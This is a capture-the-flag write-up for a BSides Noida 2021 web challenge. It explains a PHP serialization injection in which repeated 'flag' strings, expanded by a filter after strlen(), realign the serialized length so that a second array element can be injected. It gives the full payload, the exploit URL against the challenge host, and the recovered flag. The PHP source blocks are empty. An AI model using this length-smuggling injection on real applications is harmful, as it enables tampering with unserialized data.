# Solution There are no interesting things on the web page so I look at the source code ```html PLSSS DONT HACK ME!!!!!! ``` There is a comment "**debug**" So we have to set "**debug**" http parameter `34.88.85.200:4001/?debug` We can see the source code ```php ``` Let's understand the code ```php ``` The rest is checking `debug` http parameter and if it is seted show the source *code* So far we understand the code To get the **flag** the second index of the result from `unserialize` must be "V13tN4m_number_one " instead of "Fl4g_in_V13tN4m" Our *input* which is combined with *serialization format* in `$ser` variable is unfiltered and we can do **injection** attack! But we can't send `";i:1;s:19:"V13tN4m_number_one ";}` straight because `strlen($username)` return the length of our whole payload ``` a:2:{i:0;s:strlen($username):"$username;... becomes a:2:{i:0;s:34:"";i:1;s:19:"V13tN4m_number_one ";}... ``` The integer after **first** `s` must be the length of the **first** string.In our case it is `34` and the string is empty "" So it doesn't work Luckily there is `filter` function which replaces "flag" with "flagcc" and extending the length of the **first** string by 2.The function is called after `strlen($username)` so we can make our *length* of **first string** equals to the result of `strlen` After trying for the length to be matched, the final *payload* looks like this `flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}` When we pass that *payload* ``` before passing to filter function a:2:{i:0;s:102:"flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}... after passing to filter function a:2:{i:0;s:102:"flagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagcc";i:1;s:19:"V13tN4m_number_one ";}.. ``` The length of **first** string `flagccflagcc...` is now 102 and it equals to the integer after **first** `s` Send that **payload**!!! `http://34.88.85.200:4001/?name=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag%22;i:1;s:19:%22V13tN4m_number_one%20%22;}` And there is the flag ![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo/info.png) *flag*: `BSNoida{3z_ch4all_46481684185_!!!!!!@!}` Original writeup (https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo).